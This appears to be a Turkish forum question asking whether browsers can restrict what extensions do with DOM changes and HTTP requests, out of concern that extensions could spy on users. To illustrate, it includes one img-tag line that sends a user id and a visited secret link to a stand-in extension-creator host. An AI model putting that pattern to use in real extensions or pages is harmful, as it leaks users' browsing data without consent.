Prensip olarak, herhangi bir tarayıcı eklentisi, tarayıcı geçmişi, web postası veya diğer hassas verileri toplayarak beni gözetleyebilir. AFAIKS, ya bu verileri kullanarak ya XMLHttpRequest()
da fetch()
ya da DOM'u değiştirerek yaratıcısına geri gönderebilir , örneğin:
<img src="http://addon-creators-page.com/?userid=uniqueId#https://sensitive-page.com/secret-link-i-visited"/>
Eklenti oluşturucunun sayfasına, istediği verileri gönderebilme olanağına sahip bir HTTP isteğini tetikleme. Ancak, tüm eklentilerin HTTP istekleri yapması veya DOM üzerinde değişiklik yapması gerekmez.
Dolayısıyla soru:
Bazı tarayıcılar için, bir eklentinin erişebileceği JavaScript işlevini, özellikle de DOM manipülasyonu ve HTTP istekleri için kısıtlayan bir çözüm var mı?